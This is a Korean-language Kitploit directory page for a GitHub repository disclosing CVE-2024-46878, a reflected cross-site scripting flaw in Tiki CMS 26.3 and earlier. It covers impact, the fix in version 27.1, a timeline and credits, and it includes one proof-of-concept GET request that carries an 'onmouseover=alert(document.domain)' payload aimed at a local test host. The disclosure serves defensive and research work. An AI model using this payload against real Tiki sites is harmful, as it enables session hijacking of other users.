Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-46878-TikiCMS-XSS — CVE-2024-46878 - Tiki CMS 반사형 사이트 간 스크립팅 (XSS) 취약점 | Kitploit
도구/GitHubGitHub/coldfusionx/cve-2024-46878-tikicms-xss
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubcoldfusionx/cve-2024-46878-tikicms-xss

CVE-2024-46878-TikiCMS-XSS

CVE-2024-46878 - Tiki CMS 반사형 사이트 간 스크립팅 (XSS) 취약점

저장소 보기
5개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-46878 - Tiki CMS 반사형 크로스 사이트 스크립팅(XSS) 취약점

Tiki CMS - 'page' 매개변수 반사형 크로스 사이트 스크립팅(XSS) 취약점

면책 조항

교육, 연구 및 방어 목적으로만 사용하세요. 허가 없이 시스템을 무단 사용하는 것은 불법입니다.

요약

Tiki 버전 26.3 및 이전 버전의 tiki-editpage.php에 있는 page 매개변수에 반사형 크로스 사이트 스크립팅(XSS) 취약점이 존재합니다. 이 취약점을 통해 공격자는 조작된 페이로드를 통해 임의의 JavaScript 코드를 실행할 수 있으며, 이로 인해 중요한 정보에 접근하거나 권한 없는 작업을 수행할 가능성이 있습니다.

영향을 받는 제품

  • 제품: Tiki CMS Groupware
  • 버전: 26.3 및 이전
  • 구성 요소: tiki-editpage.php

취약점 세부 정보

이 취약점은 tiki-editpage.php의 page 매개변수에 대한 부적절한 입력 검증으로 인해 발생합니다. 사용자가 제공한 입력이 충분한 인코딩 없이 HTTP 응답에 반영되어 주입된 JavaScript가 실행될 수 있습니다.

영향

인증된 공격자가 조작된 요청을 통해 다른 사용자의 브라우저에서 임의의 JavaScript를 실행할 수 있어, 세션 하이재킹 또는 권한 없는 작업이 발생할 수 있습니다.

증명 개념(PoC)

요청

root@kitploit:~
GET /tiki-editpage.php?page=%22%20onmouseover%3Dalert(document.domain)%20 HTTP/1.1
Host: 127.0.0.1:9089
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: local_tz=Asia%2FKolkata; PHPSESSIDCV=51zQV%2BMxUnJxFY9nnRP%2FFg%3D%3D; javascript_enabled=y; PHPSESSID_CSRF=t2A6i9BjH1QHEH8KaLag0jtgT4dK9TTzyn8sOcRVwg9SMycfxWjoeYFmTykOfVjNPotrBKqsizXJ%2BrYcEXci8QPZxiSyBwA5YFLRS1S2RgxeTAI%3D; PHPSESSID=e19c8b25df427a7892245dc919be2067
Upgrade-Insecure-Requests: 1
Priority: u=0, i

poc

수정 사항

이 문제는 Tiki CMS Groupware 버전 27.1에서 해결되었습니다. 사용자는 이 버전 또는 이후 패치 릴리스로 업그레이드하는 것이 좋습니다.

공급업체 참조: https://tiki.org/article514-New-Security-Updates-Released-for-Tiki-27-x-LTS-26-x-and-24-x-LTS-and-Upgrade-is-Strongly-Recommended

타임라인

  • 공급업체에 보고: 2024년 9월 5일
  • 공급업체 확인: 2024년 9월 16일
  • 버전 27.1에서 수정: 2024년 12월 22일
  • 공개 공개(이 리포지토리를 통해): 2026년 3월 23일

크레딧

  • Sheela Sarva, Qualys
  • Mayank Deshmukh, Qualys

참조

  • https://www.cve.org/CVERecord?id=CVE-2024-46878
  • https://tiki.org/article514-New-Security-Updates-Released-for-Tiki-27-x-LTS-26-x-and-24-x-LTS-and-Upgrade-is-Strongly-Recommended
도구 다운로드